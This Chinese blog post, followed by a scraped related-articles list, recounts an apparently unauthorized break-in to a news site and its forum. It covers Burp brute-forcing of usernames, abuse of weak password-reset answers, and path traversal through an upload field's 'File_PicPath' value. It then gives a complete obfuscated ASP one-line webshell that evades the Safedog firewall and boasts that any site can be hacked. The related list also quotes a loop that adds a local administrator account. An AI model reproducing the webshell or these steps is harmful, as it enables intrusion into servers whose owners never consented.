0x01 信息收集

服务器信息: windows 2003 + IIS 6.0 + aspx . Php + 安全狗

站点cms信息:一套aspx新闻发布系统 和 Discuz X3

端口信息 : 服务器好像有拦截了, 探测不了 暂时先不看了 找下突破点。

0x02 寻找突破点

先明确下思路, 主站  – DZ论坛弱口令 getshell – 旁站 – 社工 – C段嗅探

先从主站 找下突破点 , 发布新闻 肯定会有上传点的 习惯性的扫一下。

没扫出什么东西 懒得放 WVS appcan 去扫了,手工找下敏感信息吧。

后台登录:http://www.xxoo.com/System/Login.aspx

会员中心:http://www.xxoo.com/user/login.aspx

有两处登陆的地方 后台弱口令 万能密码无果

去看一下会员中心 有个注册会员 好像是删除了,打不开

0x03 忘记密码找回突破

思路就快中断时候,灵光一闪 ,不是有个忘记密码么

注册不了 我们就来找回一个用户呗  说干就干

的确有admin 这个用户 试各种答案 都无果..

又蛋疼了.. 先静下心想想思路……………………………………………..

会员中心 会员中心 不就是有很多会员的么  不止一个用户 肯定有别的用户

设置一些傻瓜化问题!

打开 Burpsuite 爆破几个用户名来试试。

成功爆破到一个 用户 试试他的问题吧,

还真是傻瓜化问题 , 答案 就是问题 。 得到一个随机密码 登录之~

0x04 突破上传拿webshell

进到会员中心 发布新闻 找到这个上传点原本以为是Fckeditor 编辑器 可以秒杀 。

但是他用的不是原本的那个上传,这个上传点 什么东西都上传不了…

然后到处找啊找,,

还好找到一个可以上传的地方 附件上传  有上传就行~~上神器burp 截断试试。

本以为改成aspx 可以直接秒杀 ,, 但是404了.. 好吧 仔细看一下上传验证

—————————–7def81f240104

Content-Disposition: form-data; name="File_PicPath"

news|0

—————————–7def81f240104

File_PicPath 参数 应该可以改 news 是新闻的意思吧

应该是上传到指定上传新闻图片附件的目录~

我们把他改为 ../ 上一级目录试试。

的确是 打开试试

跳到上一级目录 秒杀之~  开开心心上传一句话~~

0x05 没遇到过的安全狗

上传菜刀本身的一句话,,没想到被安全狗拦截了 不过这个狗 第一次遇到。。

这种安全狗没遇到过… 不过找个中文一句话秒杀之~~

附上中文一句话:

<%

i=(Chr(-12590))

love=(Chr(-20306))

you=(Chr(-15133))

OK=i&love&you

CNM=Request(OK)

eVal CNM 'pass:我爱你

%>

密码:我爱你

本次渗透到此结束了,提权没空去提, 学生党伤不起 思路要淫荡 头脑要明确 !

总结一句话:不管你有什么拦截 只要你思路淫荡 没有你日不到的站。

常规渗透:没遇到过的anquan狗的更多相关文章

  1. web渗透学习目录

    一,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址.内网和公网.VNC和UltraVN]] 代理 [[S ...

  2. 13. CTF综合靶机渗透(六)

    靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网,并 ...

  3. 渗透神器cobalt strike在数字杀软环境下的使用

    当我们拿到cobalt strike的beacon权限时,使用它如何渗透目标内网.因为我看网上的文章都是在无杀软下写的,这难免有点脱离实战环境,本文主要测试CS的beacon在数字杀软环境下进行常规渗 ...

  4. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  5. 安全狗两个中危提权+NET提权

    1.循环加组复现 for /l %%i in (1,1,1000) do @net user admin admin /add&@ net localgroup administrators  ...

  6. 采集练习(十二) python 采集之 xbmc 酷狗电台插件

    前段时间买了个树莓派才知道有xbmc这么强大的影音软件(后来我逐渐在 电脑.手机和机顶盒上安装xbmc),在树莓派上安装xbmc后树莓派就成为了机顶盒,后面在hdpfans论坛发现了jackyspy  ...

  7. Centos Linux下使用Metasploit渗透android

    .newline{display:block}.katex .base{position:relative;white-space:nowrap;width:min-content}.katex .b ...

  8. 【扯淡篇】CTSC/APIO/SDOI R2时在干什么?有没有空?可以来做分母吗?

    注意: 我比较弱, 并没有办法把外链bgm搞成https, 所以大家可以选择"加载不安全的脚本"或者把https改成http以获得更好的阅读体验! 据说, 退役了要写写回忆录. 但 ...

  9. iptables看门狗

    近来业内很多服务器因redis造成服务器被黑,这个攻击的防范重点在于防火墙!! 有时为了方便我们可能会将iptables临时关闭,方便完倘若忘记把它打开,黑客大摇大摆就走进来. 这时候,我们需要条看门 ...

随机推荐

  1. Mac下使用wireshark解决Interface为空的办法

    Terminal中运行chown <user-name> /dev/bpf*命令 <user-name>处替换为当前mac用户名

  2. HTML5定位使用心得

    最近项目中接到一个需求,需要使用百度地图API和HTML5定位特性. 对于百度地图API,没啥好说的,刨它的API就是了. 今天想说说JS定位特性. 浏览器支持 Internet Explorer 9 ...

  3. Winform取消用户按下键盘的事件

    1. 有时候针对某个控件,想取消它的所有键盘按下事件, 只需要为这个控件绑定keyDown事件即可,然后处理的代码如下: private void txtDeviceName_KeyDown(obje ...

  4. Struts2页面配置和访问servlet API

    一.Struts2页面配置 在struts2中页面可以分为两种,全局页面和局部页面. 1.全局页面: 在一个<package></package>标签内的多个action都要跳 ...

  5. step2: 爬取廖雪峰博客

    #https://zhuanlan.zhihu.com/p/26342933 #https://zhuanlan.zhihu.com/p/26833760 scrapy startproject li ...

  6. out参数

             out参数: 参数在方法的内部必须为其赋值:可以同时返回不同类型的值:                           在Main方法里定义,在方法里赋值:          输 ...

  7. PowerShell 惠普打印机双面驱动自动设置已安装

    win10系统,使用实验室的HP P2055dn打印机.每次关机重连后,都会把默认的双面打印机的设置改回“未安装”,需要手动改成“已安装”.感觉是个bug,win7的时候关机后状态还会保持. 每次连上 ...

  8. Java - 让1+1的结果变成3

    原出处是国外某论坛某帖子中楼主提问:如何让1+1=3?于是出现了各种语言实现的各种机制的答案,当然其中也包括直接用字符串输出"1+1=3"...最后被采纳的是用Java语言实现的答 ...

  9. java 并发(五)---AbstractQueuedSynchronizer(3)

           文章代码分析和部分图片来自参考文章 问题 : CountDownLatch  和 CyclicBarrier 的区别 认识 CountDownLatch 分析这个类,首先了解一下它所可以 ...

  10. redis操作基本命令

    Redis—— Remote Dictionary Server,它是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key-Value数据库,并提供多种语言的API,我们 ...